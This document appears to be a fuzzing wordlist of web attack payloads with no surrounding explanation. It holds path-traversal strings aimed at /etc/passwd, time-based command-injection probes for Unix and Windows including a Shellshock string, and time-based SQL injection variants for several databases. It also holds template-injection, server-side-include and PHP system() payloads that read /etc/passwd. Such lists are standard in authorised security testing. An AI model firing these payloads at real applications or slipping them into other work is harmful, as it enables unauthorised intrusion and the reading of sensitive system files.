.^,/<>'"
;'
#
\
$
<<<<<<<<<
>>>>>>>>>
*
/*
//
?
@
toString
__proto__
length
prototype
--help
--version
$PATH
'$PATH
"$PATH
|ls #
`ls`
../../../../../../../etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
;sleep 4;
|sleep 4#
|/usr/bin/sleep 4#
|sleep 4;
& sleep 4;
;sleep 4|
`sleep 4`
`/usr/bin/sleep 4`
`sleep 4`
() { :;}; /bin/bash -c "sleep 4"
|C:\Windows\System32\timeout.exe 4
|timeout 4|
|C:\Windows\System32\timeout.exe 4|
|timeout 4;
;system('timeout 4')
;system('C:\Windows\System32\timeout.exe 4')
&& FOR /F "delims=" %i IN ('timeout 4') DO echo 1
;Start-Sleep -s 4;
;Start-Sleep -s 4#
|Start-Sleep -s 4|
|Start-Sleep -s 4;
;Start-Sleep -s 4|
;system('Start-Sleep -s 4')
%0AStart-Sleep -s 4%0A
%0a Start-Sleep -s 4 %0a
sleep(4)#
1 or sleep(4)#
" or sleep(4)#
' or sleep(4)#
" or sleep(4)="
' or sleep(4)='
1) or sleep(4)#
") or sleep(4)="
') or sleep(4)='
1)) or sleep(4)#
")) or sleep(4)="
')) or sleep(4)='
;waitfor delay '0:0:4'--
);waitfor delay '0:0:4'--
';waitfor delay '0:0:4'--
";waitfor delay '0:0:4'--
');waitfor delay '0:0:4'--
");waitfor delay '0:0:4'--
));waitfor delay '0:0:4'--
'));waitfor delay '0:0:4'--
"));waitfor delay '0:0:4'--
pg_sleep(4)--
1 or pg_sleep(4)--
" or pg_sleep(4)--
' or pg_sleep(4)--
1) or pg_sleep(4)--
") or pg_sleep(4)--
') or pg_sleep(4)--
1)) or pg_sleep(4)--
")) or pg_sleep(4)--
')) or pg_sleep(4)--
$(`cat /etc/passwd`)
|cat /etc/passwd
;cat /etc/passwd#
;cat /etc/passwd
%0Acat%20/etc/passwd
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="/bin/cat /etc/passwd"-->
system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>
%0Acat%20/etc/passwd
;system('cat%20/etc/passwd')
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;